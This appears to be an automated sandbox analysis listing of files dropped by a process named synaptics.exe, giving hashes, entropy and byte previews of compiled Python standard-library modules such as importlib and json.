                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9353
                                                                                                                                                                                                            Entropy (8bit):5.32110538902901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mptzll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:ITl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                            MD5:87386441616F11B3CD55759220A99842
                                                                                                                                                                                                            SHA1:F18ED3F4F99D25A6E55AD7EF4BBDA73813E32C31
                                                                                                                                                                                                            SHA-256:F807CFBBBFBB41D37063A4FD377D13E3386C80A67768FE896FBDE3145F26AEE4
                                                                                                                                                                                                            SHA-512:21A7A350A9AB02FECD8BD2ED519D8C861F80F706D20A345D14E835A2280D9C2EF19DD4ACC79A1967A8530C61B9C594640C3D83F5921217F32B2382AA1A5DA717
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Res
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9353
                                                                                                                                                                                                            Entropy (8bit):5.32110538902901
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mptzll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:ITl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                            MD5:87386441616F11B3CD55759220A99842
                                                                                                                                                                                                            SHA1:F18ED3F4F99D25A6E55AD7EF4BBDA73813E32C31
                                                                                                                                                                                                            SHA-256:F807CFBBBFBB41D37063A4FD377D13E3386C80A67768FE896FBDE3145F26AEE4
                                                                                                                                                                                                            SHA-512:21A7A350A9AB02FECD8BD2ED519D8C861F80F706D20A345D14E835A2280D9C2EF19DD4ACC79A1967A8530C61B9C594640C3D83F5921217F32B2382AA1A5DA717
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Res
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37120
                                                                                                                                                                                                            Entropy (8bit):5.211626473615754
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:b7MjZ3JEQWRwd2Aj+j5El+bA16p34b50nOlt8/:b7cAL9iGzo+Ol2/
                                                                                                                                                                                                            MD5:4BE663667F19356679BC2E5F7FF57E0E
                                                                                                                                                                                                            SHA1:37D7E944D410779684C39B51E76B3D534AB70FE5
                                                                                                                                                                                                            SHA-256:55645A83A679BB7BD4CCACAAB5B5F756DA5A0CB1817A626A0899A776740E9DDE
                                                                                                                                                                                                            SHA-512:16C8673493F63BD5798D174EC8FD68BF00706511CBC9D4612C057751D0144DEA7616364D22997D6644DE8B02593421E0058377D6558BC2E5B3B04F43A9079270
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37120
                                                                                                                                                                                                            Entropy (8bit):5.211626473615754
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:b7MjZ3JEQWRwd2Aj+j5El+bA16p34b50nOlt8/:b7cAL9iGzo+Ol2/
                                                                                                                                                                                                            MD5:4BE663667F19356679BC2E5F7FF57E0E
                                                                                                                                                                                                            SHA1:37D7E944D410779684C39B51E76B3D534AB70FE5
                                                                                                                                                                                                            SHA-256:55645A83A679BB7BD4CCACAAB5B5F756DA5A0CB1817A626A0899A776740E9DDE
                                                                                                                                                                                                            SHA-512:16C8673493F63BD5798D174EC8FD68BF00706511CBC9D4612C057751D0144DEA7616364D22997D6644DE8B02593421E0058377D6558BC2E5B3B04F43A9079270
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2368
                                                                                                                                                                                                            Entropy (8bit):5.168844884825288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l9uvHOKj19XocKHdq5UHdUktPdSNwplt9SDYvloUTG:AHOK3ocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                                            MD5:47E4283CD2F8D94F6F6D21504ABD4BE8
                                                                                                                                                                                                            SHA1:E1ED98A7F468DCF5C7F9E24D0C2C7A0F4802E036
                                                                                                                                                                                                            SHA-256:CA658171CB7ACD8C14E8B78CF19DE47C6DBE6BE06A4D40115120B1C77F1D8F88
                                                                                                                                                                                                            SHA-512:B58949E848F598994AB09A40922998025FDF69A2BEE44CC54CFDF0066F08D54E3D203DF78CC6F6F00F0AF5C45877C7EFA44EE0FD2A13DB69FD95A5D079FB7D1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1543
                                                                                                                                                                                                            Entropy (8bit):5.032863321149978
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lYBf0Xkl4KOSI4mh6p6nqdcWB1cegfhe+oqq60qqp:+WXTKOSe62qdDB1cegJeJqq60qqp
                                                                                                                                                                                                            MD5:A7C33B14EC80EE05412101FB75B7260F
                                                                                                                                                                                                            SHA1:9870F08F11F4CAC59C0E9970EB3674B85564AD87
                                                                                                                                                                                                            SHA-256:82D245BE15052FF16F03303CB7A3C928E5C6DFA5B5BABE1745D3235DCEB8B418
                                                                                                                                                                                                            SHA-512:D49F372C66FBCA8FCB28057D4FD7C22949DFECFFE6E9BE4B39966457A9E43A3DFA98E303F4DF971EA911399D751108B197649B15C1E0872D36E39256B21C3E4C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.Fr
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3133
                                                                                                                                                                                                            Entropy (8bit):5.107483314435514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lyHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/M:PoOCDUX4sXwjvMXNpa561qoOIk
                                                                                                                                                                                                            MD5:5CBB6A76B7794E9C73514ADA96D7231E
                                                                                                                                                                                                            SHA1:6016D91D328A87767B9E0F69F53DCA0DD32C32D4
                                                                                                                                                                                                            SHA-256:F097420DD996DDE4E04F562C915942508F5F9D3B77F379045B662F2D60F5DD18
                                                                                                                                                                                                            SHA-512:D737F45D7E6A8892A25565CAAD37CC43FC0013EBF82C97C782967ABD7AC15FA2E4EC82FCFBD65A41B0DF0502F04EA1616AB61C529DF10EAF7147FA5524256141
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3133
                                                                                                                                                                                                            Entropy (8bit):5.107483314435514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lyHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/M:PoOCDUX4sXwjvMXNpa561qoOIk
                                                                                                                                                                                                            MD5:5CBB6A76B7794E9C73514ADA96D7231E
                                                                                                                                                                                                            SHA1:6016D91D328A87767B9E0F69F53DCA0DD32C32D4
                                                                                                                                                                                                            SHA-256:F097420DD996DDE4E04F562C915942508F5F9D3B77F379045B662F2D60F5DD18
                                                                                                                                                                                                            SHA-512:D737F45D7E6A8892A25565CAAD37CC43FC0013EBF82C97C782967ABD7AC15FA2E4EC82FCFBD65A41B0DF0502F04EA1616AB61C529DF10EAF7147FA5524256141
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):595
                                                                                                                                                                                                            Entropy (8bit):5.187554540907631
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CCy//48ZPUbmR6OHRgD4gvwfJLV0jyr4eVfswsoVzoufN++k+Zqq18:lsDPUe6+k4fJgyEEfgODlfnZqq18
                                                                                                                                                                                                            MD5:E628272F9380DB4217FDB3DF472A2475
                                                                                                                                                                                                            SHA1:5BB1D65FD265558BB79970F2EE70CC943C251B6B
                                                                                                                                                                                                            SHA-256:9DACAA103628FF1089C1A94A25077A1B78C08C14611EE47075A50B9E67F38BA9
                                                                                                                                                                                                            SHA-512:8006373B3262AE7D103D22AF55F2847EB02DBE5A26B882065ACE4C2B5B31DFFE7168F1A3DE091B39F699EFAD1893BC648860E354F8B544B5EA4979A9FC27E233
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2288
                                                                                                                                                                                                            Entropy (8bit):4.738157884292716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lpgnzBuSda0E0UuJpYwj1JEZNmsZBCdHEjX9vlq:ngNuaa0xUAp/j1JErm8BCdHED90
                                                                                                                                                                                                            MD5:06505A8050EF26E03612A4F213B7D145
                                                                                                                                                                                                            SHA1:91DD29C4DF72258D47AB4E665A67919E6B2B44BC
                                                                                                                                                                                                            SHA-256:03CD7A683504BBBEF7CA84BA9BA76C75AAD84E302B050D65C4C94479948958CB
                                                                                                                                                                                                            SHA-512:59CC27046A84A3A3EA61054F5A441EEFE5E990201BDA94F00CF5B35E0AD4028F4F8D5AAD216DF2CBC620E4EE3B8E424386F81734C4CA61E319DA8A2B283A4AA1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....GC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Retur
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3084
                                                                                                                                                                                                            Entropy (8bit):5.063812749406986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LhFXWTrbGowYRzHinOrIAeQc2u4Kr0OqugqhFqYbvHqILqtk3RO/8C9HqL7dRjqu:bowCmVAeQgbqfq/qIqoqu9UHqHdRjqqL
                                                                                                                                                                                                            MD5:62912C80E3FD6CE62531C71DB13D1BAC
                                                                                                                                                                                                            SHA1:B9766BE973D2D691F13B3900E02DF2B804B3E1AD
                                                                                                                                                                                                            SHA-256:32F9F74B9E79D5561857CC6BA4DC88A6BB2449AAE0031482A07078E915D657FB
                                                                                                                                                                                                            SHA-512:FCB96A1DC910D307AC84238BD2671815A8799CA24162E67685F794DAD773CF5C5179968A533D190A8C6BE8E933D679C68FC4F57102A13E2DFA82E92D2F219657
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                            Entropy (8bit):5.385390523265271
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:XM0k25NKigD6B7+vx1GkRGqb9j4ytKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:XM0TNKigBvx99j4g3vxx47OZrXZrb/
                                                                                                                                                                                                            MD5:E5D40A9E8C8F19F050A5F1969575F577
                                                                                                                                                                                                            SHA1:8D954A3601D5EACDDB922B5D6FF1E32E3C2AAB50
                                                                                                                                                                                                            SHA-256:14650CF8FBF354C60985B3F9CFD4E98EA32DB898B87B87C9BB8D65332C49F6B8
                                                                                                                                                                                                            SHA-512:8F835E52B219DAD67327CB250489775FC038D5939436CC9F52AF10735EF1A4EE78AF6A8ACA39AEAA409CC357A990E44C95CF2588D801B583405F344EDA93A98E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9790
                                                                                                                                                                                                            Entropy (8bit):5.5689596653783004
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zEe7Hw9dSfu7lO+V4F9euIL0t1gwaF8mbANHFThJt7AeIsk9uYE5:QsHw9dT8+w9elwt28muIt4YQ
                                                                                                                                                                                                            MD5:0FAF423047E75115C2D9AA0A5E9AB8AF
                                                                                                                                                                                                            SHA1:CA4816CA33996B5D147C722F49795697C9A29EAA
                                                                                                                                                                                                            SHA-256:C040CF9236188ACF5B36686BB9150E4FC259B9F74D18465BEDE5610BD85BB42D
                                                                                                                                                                                                            SHA-512:01C7D7EDD6E0980B901DAEB7F2CFD718CC9486360D4DFEF2F584CA7E251D54BA0F2144554A1980BADAADF974556A0CDEF840663EF9FD51C6438A962A5577431C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11141
                                                                                                                                                                                                            Entropy (8bit):5.498819429424781
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:fqB3Tkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:ydDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                                            MD5:55584CDD3E3FFDF5E444B1B34570C79E
                                                                                                                                                                                                            SHA1:4DA6A01EBFAA84E4346935D464DAC05DE60238B1
                                                                                                                                                                                                            SHA-256:DF04220ACFB3504726A3C2257CA2D8472F0F5016FFC9309CCD768F635506242A
                                                                                                                                                                                                            SHA-512:B7354DA7C3334E7F0ECD066CA17BF4094CE3A018DF3B4B8FDD29C775BAB2EA16B1AC32B91AE61D432CBE483C771766300496E9CBA625C4E04E3D41073E9CE39C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
